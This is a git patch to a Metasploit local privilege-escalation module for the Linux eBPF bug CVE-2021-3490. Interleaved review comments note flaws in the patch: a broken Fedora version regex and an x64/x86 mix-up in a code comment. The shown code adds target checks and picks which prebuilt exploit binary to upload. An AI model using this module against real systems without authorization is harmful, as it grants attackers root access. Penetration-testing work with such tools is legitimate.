From db5ac81ecf76e1929fe1ed01a8951b2e00dde97c Mon Sep 17 00:00:00 2001
From: Grant Willcox
Date: Mon, 23 Aug 2021 13:23:40 -0500
Subject: [PATCH] Fix up mistakes bcoles pointed out and also add in a check to ensure we are only targetting x64 systems
---
 ...e_2021_3490_ebpf_alu32_bounds_check_lpe.md | 2 +-
 ...e_2021_3490_ebpf_alu32_bounds_check_lpe.rb | 24 ++++++++++++++-----
 2 files changed, 19 insertions(+), 7 deletions(-)
diff --git a/documentation/modules/exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.md b/documentation/modules/exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.md
index ae3abc20e9..d1dc7096e1 100644
--- a/documentation/modules/exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.md
+++ b/documentation/modules/exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.md
@@ -11,7 +11,7 @@ and write in the Linux kernel and therefore achieve arbitrary code execution as
 the `root` user.
 The target system must be compiled with eBPF support and not have
-`kernel.unprivileged_bpf_disabled` set to `1`, which prevents unprivileged
+`kernel.unprivileged_bpf_disabled` set, which prevents unprivileged
 users from loading eBPF programs into the kernel. Note that if
 `kernel.unprivileged_bpf_disabled` is enabled this module can still be
 utilized to bypass protections such as SELinux, however the user
diff --git a/modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb b/modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb
index 81ec194764..90c0038eb2 100644
--- a/modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb
+++ b/modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Local
 code execution as the root user.
 The target system must be compiled with eBPF support and not have
- kernel.unprivileged_bpf_disabled set to 1, which prevents unprivileged
+ kernel.unprivileged_bpf_disabled set, which prevents unprivileged
 users from loading eBPF programs into the kernel. Note that if
 kernel.unprivileged_bpf_disabled is enabled this module can still be
 utilized to bypass protections such as SELinux, however the user
@@ -80,6 +80,18 @@ class MetasploitModule < Msf::Exploit::Local
 end
 def check
+ arch = kernel_hardware
+
+ # Could we potentially support x86? Yes, potentially. Will we? Well considering the 5.7 kernel was released
+ # in 2020 and official support for x64 kernels ended in 2012 with
+ # https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=743aa456c1834f76982af44e8b71d1a0b2a82e2
+ # combined with the fact that those distros that do have older x86 versions mostly have 4.x or older kernels,
+ # and 90% of them have dropped support for x86 kernels a while back, we'll just assume that if its x86, its probably not
+ # running an affected Linux kernel.
+ unless arch.include?('x86_64')
+ return CheckCode::Safe("System architecture #{arch} is not supported")
+ end
+
 if unprivileged_bpf_disabled?
 return CheckCode::Safe('Unprivileged BPF loading is not permitted')
 end
@@ -106,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Local
 elsif (Rex::Version.new(major_version) != Rex::Version.new('5.8.0')) && (Rex::Version.new(major_version) != Rex::Version.new('5.11.0'))
 return CheckCode::Unknown('Unknown target kernel version, recommend manually checking if target kernel is vulnerable.')
 end
- elsif release =~ /\.fc32\./
+ elsif release =~ /\.fc[32,33,34]\./
 version_array = release.split('-')
 major_version = version_array[0]
 minor_version = version_array[1].split('.')[0]
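Review bot: `unless arch.include?('x86_64')` in the new `check` gate raises NoMethodError instead of returning a CheckCode if `kernel_hardware` ever yields nil (for instance when `uname -m` cannot be run over the session; the helper itself is not visible here), so `arch = kernel_hardware.to_s` on the first added line would keep `check` from aborting. The comment block above the gate says `official support for x64 kernels ended in 2012` while the sentences around it argue about 32-bit x86, so it presumably means x86; `its x86, its probably not` should read `it's x86, it's probably not`. The gate only lives in `check`: if `exploit` (outside this hunk) does not call `check` first, the same architecture test belongs there too, otherwise the prebuilt binaries are still pushed to a non-x64 host.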
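Review bot: The replacement pattern `/\.fc[32,33,34]\./` in the `@@ -106,7 +118,7 @@` hunk is a single-character class (the digits 3, 2, 4 and a comma), so it matches `.fc3.` or `.fc,.` but never `.fc32.`, `.fc33.` or `.fc34.`; the Fedora branch that the original `/\.fc32\./` reached is now unreachable and Fedora release strings fall through to whatever follows. The line should read `elsif release =~ /\.fc3[234]\./` (or `/\.fc(?:32|33|34)\./`). The same mistake is repeated on all four changed lines of the `@@ -154,13 +166,13 @@` hunk, where it also decides which binary is uploaded and currently sends every Fedora target down the `groovy.bin` else arm; one frozen constant such as `FEDORA_RELEASE_RE = /\.fc3[234]\./` used in all five places would keep them in step. The enclosing method continues outside this hunk.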
@@ -154,13 +166,13 @@ class MetasploitModule < Msf::Exploit::Local
 major_version = release.split('-')[0]
 if (Rex::Version.new(major_version) == Rex::Version.new('5.11.0'))
 upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'hirsute.bin'))
- elsif release =~ /\.fc32\./ && major_version =~ /5\.7/
+ elsif release =~ /\.fc[32,33,34]\./ && major_version =~ /5\.7/
 upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'fedora-5-7.bin'))
- elsif release =~ /\.fc32\./ && major_version =~ /5\.8/
+ elsif release =~ /\.fc[32,33,34]\./ && major_version =~ /5\.8/
 upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'fedora-5-8.bin'))
- elsif release =~ /\.fc32\./ && major_version =~ /5\.9/
+ elsif release =~ /\.fc[32,33,34]\./ && major_version =~ /5\.9/
 upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'fedora-5-9.bin'))
- elsif release =~ /\.fc32\./ && major_version =~ /5\.10/
+ elsif release =~ /\.fc[32,33,34]\./ && major_version =~ /5\.10/
 upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'fedora-5-10.bin'))
 else
 upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'groovy.bin'))